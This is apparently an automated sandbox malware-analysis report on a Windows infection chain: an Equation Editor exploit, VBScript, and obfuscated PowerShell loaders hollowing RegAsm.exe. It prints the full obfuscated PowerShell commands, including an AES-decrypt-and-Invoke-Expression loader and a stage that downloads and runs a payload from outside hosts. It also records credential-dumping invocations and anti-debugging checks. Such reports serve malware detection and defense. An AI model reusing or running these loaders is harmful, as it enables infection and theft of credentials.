            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044E879 FindFirstFileExA,8_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040783C FindFirstFileW,FindNextFileW,8_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_100010F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10006580 FindFirstFileExA,8_2_10006580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407C97
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004432B5 mov eax, dword ptr fs:[00000030h]8_2_004432B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10004AB4 mov eax, dword ptr fs:[00000030h]8_2_10004AB4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,8_2_00411CFE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434B47 SetUnhandledExceptionFilter,8_2_00434B47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0043BB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00434FDC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_100060E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_10002639
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_10002B1C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3604, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3888, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,8_2_004180EF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_004120F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419627 mouse_event,8_2_00419627
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwnuifnnlmnppbptlmxfdtbrgppi"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uqsnjxygzufcshdfcxkgggwipdhrwsi"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uqsnjxygzufcshdfcxkgggwipdhrwsi"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\fkyx"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return 